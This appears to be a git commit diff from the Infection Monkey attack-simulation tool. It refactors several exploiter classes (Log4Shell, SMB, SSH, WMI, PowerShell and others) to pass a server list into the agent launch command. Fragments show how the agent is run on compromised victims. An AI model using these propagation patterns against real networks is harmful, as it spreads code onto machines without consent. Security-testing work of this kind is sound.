Agent: Modify exploiters to use list of servers
This commit is contained in:
parent
95ea5e481e
commit
42de7140f3
|
@ -104,7 +104,7 @@ class HadoopExploiter(WebRCE):
|
|||
|
||||
def _build_command(self, path, http_path):
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
|
||||
monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
if self.host.is_windows():
|
||||
base_command = HADOOP_WINDOWS_COMMAND
|
||||
else:
|
||||
|
|
|
@ -115,7 +115,7 @@ class Log4ShellExploiter(WebRCE):
|
|||
|
||||
def _build_command(self, path: PurePath, http_path) -> str:
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, location=path)
|
||||
monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1, location=path)
|
||||
if self.host.is_windows():
|
||||
base_command = LOG4SHELL_WINDOWS_COMMAND
|
||||
else:
|
||||
|
|
|
@ -179,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
|
||||
agent_args = build_monkey_commandline(
|
||||
self.host, self.current_depth + 1, agent_path_on_victim
|
||||
self.servers, self.current_depth + 1, agent_path_on_victim
|
||||
)
|
||||
|
||||
return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
|
||||
|
|
|
@ -15,7 +15,7 @@ from infection_monkey.exploit.powershell_utils.powershell_client import (
|
|||
PowerShellClient,
|
||||
)
|
||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path, get_random_file_suffix
|
||||
from infection_monkey.model import DROPPER_ARG, RUN_MONKEY, VictimHost
|
||||
from infection_monkey.model import DROPPER_ARG, RUN_MONKEY
|
||||
from infection_monkey.utils.commands import build_monkey_commandline
|
||||
from infection_monkey.utils.environment import is_windows_os
|
||||
from infection_monkey.utils.threading import interruptible_iter
|
||||
|
@ -169,7 +169,7 @@ class PowerShellExploiter(HostExploiter):
|
|||
|
||||
def _run_monkey_executable_on_victim(self, executable_path):
|
||||
monkey_execution_command = build_monkey_execution_command(
|
||||
self.host, self.current_depth + 1, executable_path
|
||||
self.servers, self.current_depth + 1, executable_path
|
||||
)
|
||||
|
||||
logger.info(
|
||||
|
@ -179,9 +179,9 @@ class PowerShellExploiter(HostExploiter):
|
|||
self._client.execute_cmd_as_detached_process(monkey_execution_command)
|
||||
|
||||
|
||||
def build_monkey_execution_command(host: VictimHost, depth: int, executable_path: str) -> str:
|
||||
def build_monkey_execution_command(servers: List[str], depth: int, executable_path: str) -> str:
|
||||
monkey_params = build_monkey_commandline(
|
||||
target_host=host,
|
||||
servers,
|
||||
depth=depth,
|
||||
location=executable_path,
|
||||
)
|
||||
|
|
|
@ -91,14 +91,14 @@ class SMBExploiter(HostExploiter):
|
|||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
|
||||
"dropper_path": remote_full_path
|
||||
} + build_monkey_commandline(
|
||||
self.host,
|
||||
self.servers,
|
||||
self.current_depth + 1,
|
||||
str(dest_path),
|
||||
)
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
|
||||
"monkey_path": remote_full_path
|
||||
} + build_monkey_commandline(self.host, self.current_depth + 1)
|
||||
} + build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
|
||||
smb_conn = None
|
||||
for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
|
||||
|
|
|
@ -245,7 +245,7 @@ class SSHExploiter(HostExploiter):
|
|||
|
||||
try:
|
||||
cmdline = f"{monkey_path_on_victim} {MONKEY_ARG}"
|
||||
cmdline += build_monkey_commandline(self.host, self.current_depth + 1)
|
||||
cmdline += build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
cmdline += " > /dev/null 2>&1 &"
|
||||
ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)
|
||||
|
||||
|
|
|
@ -370,14 +370,16 @@ class WebRCE(HostExploiter):
|
|||
default_path = self.get_default_dropper_path()
|
||||
if default_path is False:
|
||||
return False
|
||||
monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1, default_path)
|
||||
monkey_cmd = build_monkey_commandline(
|
||||
self.servers, self.current_depth + 1, default_path
|
||||
)
|
||||
command = RUN_MONKEY % {
|
||||
"monkey_path": path,
|
||||
"monkey_type": DROPPER_ARG,
|
||||
"parameters": monkey_cmd,
|
||||
}
|
||||
else:
|
||||
monkey_cmd = build_monkey_commandline(self.host, self.current_depth + 1)
|
||||
monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
command = RUN_MONKEY % {
|
||||
"monkey_path": path,
|
||||
"monkey_type": MONKEY_ARG,
|
||||
|
|
|
@ -103,14 +103,14 @@ class WmiExploiter(HostExploiter):
|
|||
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
||||
"dropper_path": remote_full_path
|
||||
} + build_monkey_commandline(
|
||||
self.host,
|
||||
self.servers,
|
||||
self.current_depth + 1,
|
||||
DROPPER_TARGET_PATH_WIN64,
|
||||
)
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
||||
"monkey_path": remote_full_path
|
||||
} + build_monkey_commandline(self.host, self.current_depth + 1)
|
||||
} + build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
|
||||
# execute the remote monkey
|
||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
|
||||
|
|
Loading…
Reference in New Issue